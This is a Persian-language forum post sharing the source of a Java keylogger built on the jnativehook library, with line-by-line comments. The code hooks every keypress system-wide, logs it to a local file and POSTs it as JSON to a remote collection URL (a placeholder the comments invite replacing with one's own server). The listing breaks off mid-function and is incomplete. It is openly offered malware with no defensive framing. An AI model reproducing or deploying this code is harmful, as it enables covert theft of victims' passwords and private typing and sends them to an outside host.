SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Иван VI jAVA KEYLOGER

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • Иван VI jAVA KEYLOGER

    کد:
    // این کد با استفاده از کتابخانه jnativehook نوشته شده است
    // برای دانلود و راهنمای استفاده از این کتابخانه به لینک زیر مراجعه کنید
    // https://github.com/kwhat/jnativehook
    
    // برای استفاده از کتابخانه jnativehook، باید این خط را در بالای فایل خود قرار دهید
    import org.jnativehook.GlobalScreen;
    import org.jnativehook.NativeHookException;
    import org.jnativehook.keyboard.NativeKeyEvent;
    import org.jnativehook.keyboard.NativeKeyListener;
    
    // برای ارسال داده ها به یک سرور از راه دور، باید از کتابخانه java.net استفاده کنید
    import java.net.HttpURLConnection;
    import java.net.URL;
    
    // برای نوشتن داده ها در یک فایل، باید از کتابخانه java.io استفاده کنید
    import java.io.File;
    import java.io.FileWriter;
    import java.io.IOException;
    
    // برای تبدیل داده ها به فرمت JSON، باید از کتابخانه org.json استفاده کنید
    // برای دانلود و راهنمای استفاده از این کتابخانه به لینک زیر مراجعه کنید
    // https://github.com/stleary/JSON-java
    
    import org.json.JSONObject;
    
    // این کلاس یک listener است که وقتی یک کلید فشار داده شود، عمل مورد نظر را انجام می دهد
    public class KeyLogger implements NativeKeyListener {
    
        // این متغیر ثابت نشان دهنده آدرس سرور مقصد است
        // شما می توانید آن را با آدرس سرور خود جایگزین کنید
        public static final String SERVER_URL = "http://example.com/keylogger.php";
    
        // این متغیر ثابت نشان دهنده نام فایل محلی است
        // شما می توانید آن را با نام دلخواه خود جایگزین کنید
        public static final String FILE_NAME = "keylog.txt";
    
        // این تابع وقتی صدا زده می شود که یک کلید فشار داده شود
        public void nativeKeyPressed(NativeKeyEvent e) {
            // در اینجا ما مقدار عددی و حروفی کلید را در قالب JSON قرار می دهیم
            JSONObject data = new JSONObject();
            data.put("keyCode", e.getKeyCode());
            data.put("keyText", NativeKeyEvent.getKeyText(e.getKeyCode()));
    
            // در اینجا ما تابع sendToServer را صدا می زنیم تا داده ها را به سرور ارسال کنیم
            sendToServer(data);
    
            // در اینجا ما تابع writeToFile را صدا می زنیم تا داده ها را در فایل ذخیره کنیم
            writeToFile(data);
        }
    
        // این تابع وقتی صدا زده می شود که یک کلید رها شود
        public void nativeKeyReleased(NativeKeyEvent e) {
            // ما نیازی به انجام کار خاصی در اینجا نداریم
        }
    
        // این تابع وقتی صدا زده می شود که یک کلید تایپ شود
        public void nativeKeyTyped(NativeKeyEvent e) {
            // ما نیازی به انجام کار خاصی در اینجا نداریم
        }
    
        // این تابع داده های دریافتی را به سرور مقصد ارسال می کند
        public void sendToServer(JSONObject data) {
            try {
                // ابتدا یک شیء از کلاس URL با آدرس سرور مقصد ایجاد می کنیم
                URL url = new URL(SERVER_URL);
    
                // سپس یک شیء از کلاس HttpURLConnection با استفاده از تابع openConnection بر روی شیء URL ایجاد می کنیم
                HttpURLConnection connection = (HttpURLConnection) url.openConnection();
    
                // سپس تنظیمات لازم برای ارسال داده ها را انجام می دهیم
                connection.setRequestMethod("POST"); // مشخص می کنیم که متد POST را استفاده می کنیم
                connection.setRequestProperty("Content-Type", "application/json"); // مشخص می کنیم که فرمت داده ها JSON است
                connection.setDoOutput(true); // مشخص می کنیم که قصد داریم داده های خروجی را بفرستیم
    
                // سپس با استفاده از تابع getOutputStream بر روی شیء connection، یک جریان خروجی باز می کنیم
                OutputStream outputStream = connection.getOutputStream();
    
                // سپس با استفاده از تابع write بر روی شیء outputStream، داده های JSON را به صورت بایت به جریان خروجی می نویسیم
                outputStream.write(data.toString().getBytes());
    
                // سپس جریان خروجی را می بندیم
                outputStream.close();
    
                // در نهایت، با استفاده از تابع getResponseCode بر روی شئ connection، کد پاسخ سرور را در چاپ محلول قرار میدهيم.
                System.out.println("Response code: " + connection.getResponseCode());
    
            } catch (Exception e) {
                // در صورت وجود خطای, آن را در چاپ محلول قرار میدهيم.
                e.printStackTrace();
            }
        }
    
        // این تابع داده های دريافتي را در يک فایل ذخيره مي كند
        public void writeToFile(JSONObject data) {
            try {
                // ابتدا يک شيء از كلاس File با نام فایل مقصد ايجاد مي كنيم
                File file = new File(FILE_NAME);
    
                // سپس يک شيء از كلاس FileWriter با استفاده از شيء file و پارامتر true (برای حالت append) ايجاد مي كنيم
                FileWriter fileWriter = new FileWriter(file, true);
    
                // سپس با استفاده از تابع write بر روي​
    [align=center][align=right]When danger lurks in unknown waters, we are there to help you swim[/align][/align]
صبر کنید ..
X